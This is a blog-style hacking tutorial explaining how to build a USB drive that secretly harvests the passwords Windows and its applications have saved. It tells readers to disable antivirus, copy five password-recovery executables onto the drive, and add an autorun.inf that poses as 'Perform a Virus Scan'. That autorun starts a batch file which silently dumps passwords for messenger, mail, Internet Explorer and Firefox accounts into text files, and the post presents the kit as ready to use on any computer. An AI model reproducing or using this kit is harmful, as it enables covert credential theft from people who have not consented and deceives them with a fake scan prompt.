As
we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL,
Windows messenger etc. Along with these, Windows also stores passwords of
Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like
IE and Firefox.
There
exists many tools for recovering these passswords from their stored
places. Using these tools and a USB pen-drive, you can create your own
rootkit to sniff passwords from any computer. We need the following tools
to create our rootkit:
MessenPass: Recovers
the passwords of most popular Instant Messenger programs: MSN Messenger,
Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided
with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers
the passwords of the following email programs: Outlook Express, Microsoft
Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3,
IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla
Thunderbird, Group Mail Free.
Mail
PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords
stored by Internet Explorer browser. It supports the new Internet Explorer 7.0,
as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage,
including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more.
PasswordFox: PasswordFox
is a small password recovery tool that allows you to view the user names and
passwords stored by Mozilla Firefox Web browser. By default, PasswordFox
displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password
entry, the following information is displayed:
Record
Index, Web Site, User Name, Password, User Name Field and Password Field.
Preparing
Your USB Drive for Password Hacking:
Here
is a step by step procedure to create the password hacking toolkit:
You must temporarily disable
your antivirus before following these steps.
- Download all the 5 tools, extract them and copy only the executable
files (.exe files) onto your USB Pendrive.
ie:
Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe
and passwordfox.exe into your USB Drive.
- Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save
the Notepad and rename it from New Text Document.txt to autorun.inf.
Now copy the autorun.inf file onto your USB pen-drive.
- Create another Notepad and
write the following text onto it:
start
mspass.exe /stext mspass.txt
start
mailpv.exe /stext mailpv.txt
start
iepv.exe /stext iepv.txt
start
pspv.exe /stext pspv.txt
start
passwordfox.exe /stext passwordfox.txt
Save
the Notepad and rename it from New Text Document.txt to launch.bat.
Copy the launch.bat file to your USB drive.
Now
your rootkit is ready and you are all set to sniff the passwords. You can
use this pen-drive on on any computer to sniff the stored passwords. Just
follow these steps:
- Insert the pen-drive and the
auto-run window will pop-up. (This is because, we have created an
auto-run pen-drive).
- In the pop-up window, select
the first option (Perform a Virus Scan).
- Now all the
password recovery tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in
the .TXT files.
- Remove the pen-drive and
you’ll see the stored passwords in the .TXT files.
This
hack works on Windows 2000, XP, Vista and 7.
ACTION= Perform a Virus Scan
- Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
- In the pop-up window, select the first option (Perform a Virus Scan).
- Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
- Remove the pen-drive and you’ll see the stored passwords in the .TXT files.
No comments:
Post a Comment